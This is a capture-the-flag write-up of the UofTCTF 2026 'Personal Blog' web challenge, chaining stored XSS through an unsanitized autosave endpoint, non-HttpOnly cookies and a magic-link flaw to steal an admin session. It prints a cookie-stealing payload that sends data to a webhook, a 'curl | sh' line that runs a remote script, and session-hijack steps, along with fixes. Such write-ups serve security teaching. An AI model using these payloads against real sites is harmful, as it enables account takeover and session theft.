UofTCTF 2026 - Personal Blog

Overview

Personal Blog is a web challenge featuring a Node.js/Express blog application with a bot that simulates an admin user visiting reported URLs. The goal is to steal the admin’s session and access the /flag endpoint.

Category	Difficulty	Flag
Web Security	Medium	`uoftctf{533M5_l1k3_17_W4snt_50_p3r50n41...}`

Reconnaissance

The application consists of:

A web server (Express.js with EJS templating)
An admin bot (Puppeteer-based browser automation)

Key Features:

🔐 User registration and login
📝 Blog post creation with a rich text editor
💾 Auto-save functionality for draft posts
✨ Magic login links for passwordless authentication
🚨 URL reporting system (admin bot visits reported URLs)
🚩 /flag endpoint (admin-only access)

Vulnerability Analysis

After analyzing the source code, several vulnerabilities were identified:

Vulnerability #1: Stored XSS via Unsanitized Draft Content

Location: web/views/editor.ejs (Line 13)

The editor template renders draftContent using EJS’s unescaped output:

1
<div id="editor" ... contenteditable="true"><%- draftContent %></div>

[!WARNING] The <%- tag outputs RAW HTML without escaping, unlike <%= which escapes special characters.

Vulnerability #2: Autosave Endpoint Lacks Sanitization

Location: web/server.js (Lines 453-468)

The /api/autosave endpoint stores raw user input without sanitization:

1
app.post('/api/autosave', requireLogin, (req, res) => {
2
  // ...
3
  const rawContent = String(req.body.content || '');
4
  post.draftContent = rawContent;  // NO SANITIZATION!
5
  // ...
6
});

Compare this to /api/save which properly sanitizes:

1
app.post('/api/save', requireLogin, (req, res) => {
2
  // ...
3
  const rawContent = String(req.body.content || '');
4
  const sanitized = sanitizeHtml(rawContent);  // DOMPurify sanitization
5
  post.savedContent = sanitized;
6
  // ...
7
});

Vulnerability #3: Non-HttpOnly Cookies

Location: web/server.js (Lines 95-101)

1
function cookieOptions() {
2
  return {
3
    httpOnly: false,  // VULNERABLE! Cookies accessible via JavaScript
4
    sameSite: 'Lax',
5
    path: '/'
6
  };
7
}

With httpOnly set to false, document.cookie is accessible from JavaScript, making cookie theft via XSS possible.

Vulnerability #4: Magic Link Session Preservation

Location: web/server.js (Lines 485-503)

When a user logs in via a magic link, the previous session is preserved:

1
app.get('/magic/:token', (req, res) => {
2
  // ...
3
  const existingSid = req.cookies.sid;
4
  if (existingSid) {
5
    res.cookie('sid_prev', existingSid, cookieOptions());  // Previous session saved!
6
  }
7
  const sid = createSession(db, record.userId);
8
  res.cookie('sid', sid, cookieOptions());
9

10
  const target = safeRedirect(req.query.redirect);
11
  return res.redirect(target);
12
});

[!IMPORTANT] If the admin (logged in with their session) visits a magic link, their admin session gets saved to sid_prev, and they get a new session for the magic link’s user account.

Attack Chain

The exploit combines all vulnerabilities into a session hijacking attack:

1
sequenceDiagram
2
    participant Attacker
3
    participant Blog
4
    participant AdminBot
5
    participant Webhook
6

7
    Attacker->>Blog: 1. Create account & post
8
    Attacker->>Blog: 2. Inject XSS via /api/autosave
9
    Attacker->>Blog: 3. Generate magic link
10
    Attacker->>Blog: 4. Report: /magic/token?redirect=/edit/post_id
11
    Blog->>AdminBot: 5. Visit reported URL
12
    AdminBot->>Blog: 6. Magic link saves admin session to sid_prev
13
    AdminBot->>Blog: 7. Redirect to XSS-infected editor
14
    AdminBot->>Webhook: 8. XSS exfiltrates cookies
15
    Attacker->>Webhook: 9. Retrieve admin session
16
    Attacker->>Blog: 10. Use admin session → GET /flag

Exploitation

Step 2: Inject XSS Payload via Autosave

Create a new post, then inject XSS via the autosave API:

1
POST /api/autosave
2
Content-Type: application/json
3

4
{
5
  "postId": "<post_id>",
6
  "content": "<img src=x onerror=\"fetch('https://webhook.site/xxx?c='+encodeURIComponent(document.cookie))\">"
7
}

The XSS payload uses an <img> tag with an onerror handler that sends all cookies to an attacker-controlled webhook.

Step 3: Generate Magic Link

Navigate to /account and generate a magic login link:

1
POST /magic/generate

Step 4: Report Exploit URL

Submit the following URL to the report page:

1
/magic/<token>?redirect=/edit/<post_id>

Solve the Proof of Work challenge if required:

curl -sSfL https://pwn.red/pow | sh -s <challenge>

Step 5: Capture Admin Session

When the admin bot visits the exploit URL:

Bot loads /magic/<token> (has admin sid in cookies)
Magic link handler saves admin sid to sid_prev
Bot gets new session for attacker’s account
Bot redirects to /edit/<post_id>
Editor page renders attacker’s XSS payload
XSS executes and sends cookies to attacker’s webhook
Attacker receives: sid_prev=<admin_session>; sid=<attacker_session>

Step 6: Retrieve Flag

Use the captured admin session to access the flag endpoint:

curl --cookie "sid=<admin_session>" http://target/flag

Result: uoftctf{533M5_l1k3_17_W4snt_50_p3r50n41...} 🚩

Exploit Script

A full exploit script was created to automate this attack:

1
# Usage:
2
# Generate exploit URL (requires webhook to receive cookie)
3
python3 exploit.py https://webhook.site/your-uuid
4

5
# Get flag with captured admin session
6
python3 exploit.py dummy <admin_sid>

The script:

Registers a new user with random credentials
Logs in and creates a post
Injects XSS payload via autosave API
Generates a magic login link
Outputs the exploit URL for submission
Can retrieve flag using captured admin session

Remediation

Issue	Fix
Unescaped output	Change `<%- draftContent %>` to `<%= draftContent %>`
Missing sanitization	Apply DOMPurify in `/api/autosave` like `/api/save`
Accessible cookies	Set `httpOnly: true` in cookie options
Session preservation	Don’t save previous session on magic link login
Cross-site attacks	Consider `SameSite=Strict` for additional protection

Conclusion

This challenge demonstrated a sophisticated attack chain combining:

💉 Stored XSS through improper sanitization
🔓 Session hijacking via magic link abuse
🍪 Cookie theft through non-httpOnly cookies

The key insight was recognizing that the autosave endpoint bypassed sanitization, and that magic links preserved previous sessions. This allowed an attacker to trick the admin into visiting their XSS-infected editor page while their admin session was exposed in the sid_prev cookie.

Flag: uoftctf{533M5_l1k3_17_W4snt_50_p3r50n41...}